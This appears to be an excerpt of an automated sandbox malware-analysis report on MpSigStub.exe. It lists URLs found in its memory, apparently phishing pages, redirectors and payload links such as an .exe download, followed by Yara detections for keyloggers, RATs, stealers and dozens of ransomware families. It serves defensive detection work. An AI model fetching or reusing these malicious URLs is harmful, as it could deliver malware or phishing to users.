Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp String found in binary or memory: https://t.me/IamLev1
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp String found in binary or memory: https://t.me/IamLev1x
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://tales.pt/webmail-purchase/reportexcel.php
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: https://tapro-trgovina.com/slimneweurope/next.php
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: https://tapro-trgovina.com/yalladg/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://tdgnaples.com/.howe
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: https://techportal.cerner.com/api/validateProjectNumber?projectNumber=
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://tecnicopconline.com/wp-admin/jekbvhub.php
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: https://tegavu.com
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: https://telegra.ph/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://ternerdrivew.at/3/wwf.dll
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://ternerdrivew.at/3/wwf.exe
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://testweb.public360saas.se:443/biz/v2-pbr/docprod/templates/bot_tjansteskrivelse.docx
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: https://thecloud-jewels.com/wp-content/themes/storefront/inc/admin/ms
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://thersshy.dynssl.com//
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://thersshy.dynssl.com//post.php
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://thewatch-tv.com/guyofficeaprof/post.php
Source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp String found in binary or memory: https://thiscannotpossiblywork.local/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: https://tiagogalindo.com.br/1/ksu/index.html
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://ticket.webstudiotechnology.com/sc/wp-includes/SimplePie/XML/Declaration/ytUsz4l0Qo.php
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: https://timbeck.net/redirect/ywxpbmeuc2vyymfulwjhcmj1qgrpbnvszwdhbc5ybw==
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/bptvnhw6
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/j7tx7h8)
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/up77pck
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/y7rku84vscrobj.dll
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/yaozbad7
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/yarknmzj
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: https://tiw0dspxozds.azurewebsites.net/fdoi
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://tomamate.si/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: https://toulousa.com/omg/rockspa.php
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp String found in binary or memory: https://towingnow.ca/LvR2HWHdQ.php
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: https://tph786.com/gym/assets/css/
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: https://tr.im/1azmq)
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: https://track.fourtiz.com
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp String found in binary or memory: https://tradingdashboards.com/
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp String found in binary or memory: https://trafffi.ru/123?utm_term=
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp String found in binary or memory: https://trafffi.ru/aws?utm_term=
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: https://trafffi.ru/shook?utm_term=
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: https://trafffi.ru/strik?utm_term=
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: https://traffking.ru/123?utm_term=
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: https://traffking.ru/aws?utm_term=
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: https://traffking.ru/shook?utm_term=
Source: unknown DNS traffic detected: queries for: spclient.wg.spotify.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.com/www.google.com/] equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: "http://www.youtube.com/watch?v=nqpod5at30g" equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: .src='http://www.facebook.com/plugins/like.php?href='+encodeuricomponent( equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: 67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: 67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: :127.0.0.1 www.login.yahoo.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: <127.0.0.1 www.search.yahoo.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: @FB_www.facebook.com/modz.ryan_ProtectedBy_RyanBorland_0x equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: @FB_www.facebook.com/modz.ryan_ProtectedBy_RyanBorland_0xx equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: G"http://www.youtube.com/watch?v=nqpod5at30g" equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp String found in binary or memory: Hping -t -w 1 -l 65500 www.yahoo.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: YouTube http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: a67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: a67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: dc:\arquivos de programas\internet explorer\iexplore.exe http://www.youtube.com/watch?v=Vjp7vgj119s equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/s?wd=http://www.google.cn/search?hl=zh-CN&q=http://search.cn.yahoo.com/search?p=http://www.sogou.com/web?sogouhome=&shuru=shou&query=http://so.163.com/search.php?q= equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: http://www.rambler.ru/srch?set= equals www.rambler.ru (Rambler)
Source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp String found in binary or memory: http://www.youtube.com/watch?v= equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: www.hotmail.com equals www.hotmail.com (Hotmail)
Source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.com/ equals www.yahoo.com (Yahoo)

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected LaZagne password dumper
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Linux EvilGnome RC5 key
Source: Yara match File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected VBKeyloggerGeneric
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected LimeRAT
Source: Yara match File source: 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Keylogger Generic
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Creates a DirectInput object (often for capturing keystrokes)
Source: WerFault.exe, 00000005.00000003.2855746195.000000000294D000.00000004.00000001.sdmp Binary or memory string: DWM8And16Bit_DirectDrawCreateEx_CallOut
Installs a raw input device (often for capturing keystrokes)
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp Binary or memory string: GetRawInputData

E-Banking Fraud:

Yara detected Pony
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Njrat
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6284577103.00000197A4BC1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Predator
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected RevengeRAT
Source: Yara match File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands:

Yara detected LazParking Ransomware
Source: Yara match File source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected BlackMoon Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Zeppelin Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Ragnarok ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Apis Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Wannacry ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected MegaCortex Ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Cobra Locker ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected RekenSom ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Avaddon Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Babuk Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Nemty Ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected BLACKMatter Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Clay Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Thanos ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Jigsaw
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected CryLock ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Sapphire Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected OCT Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Snatch Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected AESCRYPT Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected RansomwareGeneric
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Silvertor Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Ouroboros ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Annabelle Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Gocoder ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp, type: MEMORY
Yara detected WannaRen ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Chaos Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Mock Ransomware
Source: Yara match File source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Conti ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a407e899.150.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a407d495.109.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a407d495.152.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a407fe9d.151.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a407e899.124.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a407d495.123.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a407fe9d.110.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a407e899.111.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a407fe9d.125.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6339772836.00000197A3E9A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6331669561.00000197A4068000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6316141195.00000197A4068000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected NoCry Ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected ByteLocker Ransomware
Source: Yara match File source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected RegretLocker Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Clop Ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Ryuk ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Porn Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected LockBit ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected DarkSide Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected LOCKFILE ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Cerber ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected HiddenTear ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Rhino ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Mailto ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected CoronaCrypt Ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Voidcrypt Ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6278908021.00000197A4866000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Buran Ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected GoGoogle ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected VHD ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Axiom Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Artemon Ransomware
Source: Yara match File source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Netwalker ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Jcrypt Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Covid19 Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Delta Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected LokiLocker Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Cryptolocker ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE
